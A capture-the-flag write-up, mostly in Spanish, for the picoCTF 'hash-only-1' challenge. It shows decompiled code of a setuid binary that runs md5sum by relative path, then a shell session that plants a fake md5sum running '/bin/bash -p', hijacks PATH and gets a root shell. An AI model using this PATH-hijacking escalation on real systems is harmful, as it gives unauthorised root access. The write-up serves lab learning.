d3bo Support

hash-only-1

pico
pwn

August 8, 20252 minutes

bool main(void)

{
  basic_ostream *pbVar1;
  basic_ostream<> *pbVar2;
  char *__command;
  long in_FS_OFFSET;
  bool bVar3;
  allocator<char> local_4d;
  int local_4c;
  basic_string<> local_48 [40];
  long local_20;
  
  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  pbVar1 = std::operator<<((basic_ostream *)std::cout,
                           "Computing the MD5 hash of /root/flag.txt.... ");
  pbVar2 = (basic_ostream<> *)
           std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar1,std::endl<>);
  std::basic_ostream<>::operator<<(pbVar2,std::endl<>);
  sleep(2);
  std::allocator<char>::allocator();
                    /* try { // try from 001013aa to 001013ae has its CatchHandler @ 0010144f */
  std::__cxx11::basic_string<>::basic_string
            ((char *)local_48,(allocator *)"/bin/bash -c \'md5sum /root/flag.txt\'");
  std::allocator<char>::~allocator(&local_4d);
  setgid(0);
  setuid(0);
  __command = (char *)std::__cxx11::basic_string<>::c_str();
                    /* try { // try from 001013de to 00101423 has its CatchHandler @ 0010146d */
  local_4c = system(__command);
  bVar3 = local_4c != 0;
  if (bVar3) {
    pbVar1 = std::operator<<((basic_ostream *)std::cerr,
                             "Error: system() call returned non-zero value: ");
    pbVar2 = (basic_ostream<> *)std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar1,local_4c)
    ;
    std::basic_ostream<>::operator<<(pbVar2,std::endl<>);
  }
  std::__cxx11::basic_string<>::~basic_string(local_48);
  if (local_20 == *(long *)(in_FS_OFFSET + 0x28)) {
    return bVar3;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

En el programa hay un momento que ejecuta un comando

            ((char *)local_48,(allocator *)"/bin/bash -c \'md5sum /root/flag.txt\'");

Está ejecutando md5sum sin poner el path completo, esto es peligroso, ya que se puede modificar el PATH y hacer que en vez de ejecutar el /usr/bin/md5sum ejecute otro md5sum malicioso en otra ruta. Si no sabes lo que es el PATH hijacking, puedes buscarlo en el buscador de la web y consultar writeups de máquinas que toquen este tema

ctf-player@pico-chall$ echo "/bin/bash -p" > md5sum
ctf-player@pico-chall$ chmod +x md5sum
ctf-player@pico-chall$ export PATH=$(pwd):$PATH
ctf-player@pico-chall$ flaghasher
Computing the MD5 hash of /root/flag.txt....

root@challenge:~# cat flag.txt
cat: flag.txt: No such file or directory
root@challenge:~# ls
flaghasher  md5sum
root@challenge:~# cat /root/flag.txt
picoCTF{sy5teM_********_5c@red_0f_yoU_54094e3e}
Prev
hash-only-2
Next
Heap 2